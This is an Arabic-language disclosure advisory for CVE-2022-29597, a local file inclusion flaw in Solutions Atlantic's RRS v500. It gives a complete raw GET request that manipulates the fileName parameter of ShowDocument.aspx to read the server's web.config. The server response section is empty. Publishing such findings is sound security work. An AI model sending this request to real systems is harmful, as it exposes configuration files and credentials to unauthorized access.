
تطبيق RRS v500 معرض لثغرة تضمين الملفات المحلية (LFI).
تطبيق RRS v500 من Solutions Atlantic عرضة لثغرة إدراج ملف محلي (LFI). يمكن لأي مستخدم مصادق عليه الإشارة إلى ملفات النظام الداخلية ضمن الطلبات المرسلة إلى الصفحة /RRSWeb/maint/ShowDocument/ShowDocument.aspx. سيقوم الخادم بالاستجابة بنجاح بمحتويات ملف النظام الداخلي المطلوب. قد تسمح هذه الإمكانية للخصوم باستخراج بيانات و/أو ملفات حساسة من نظام الملفات الأساسي، واكتساب معرفة حول الآليات الداخلية للنظام، أو الوصول إلى كود مصدر التطبيق.
Mitre URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29597
NIST URL: https://nvd.nist.gov/vuln/detail/CVE-2022-29597
الرابط المتأثر:
/RRSWeb/maint/ShowDocument/ShowDocument.aspxعند فتح أو تنزيل ملف PDF من موقع RRS، يتم إرسال طلب إلى الرابط المتأثر يتضمن معلمة fileName. يمكن تعديل هذه المعلمة لتضمين مسار نظام داخلي، مثل web.config. سيقوم الخادم بعد ذلك بتقديم الملف المطلوب.
طلب GET مع مسار داخلي إلى web.config:
GET /RRSWeb/maint/ShowDocument/ShowDocument.aspx?fileName=C:\\Program%20Files\\Solutions%20Atlantic\\RRS\\RRSWeb\\web.config HTTP/1.1
Host: <REDACTED>
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://<REDACTED>/RRSweb/default.aspx
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: _ga=<REDACTED>; ASP.NET_SessionId=<REDACTED>
Connection: Keep-Alive
استجابة الخادم:

أبريل 2022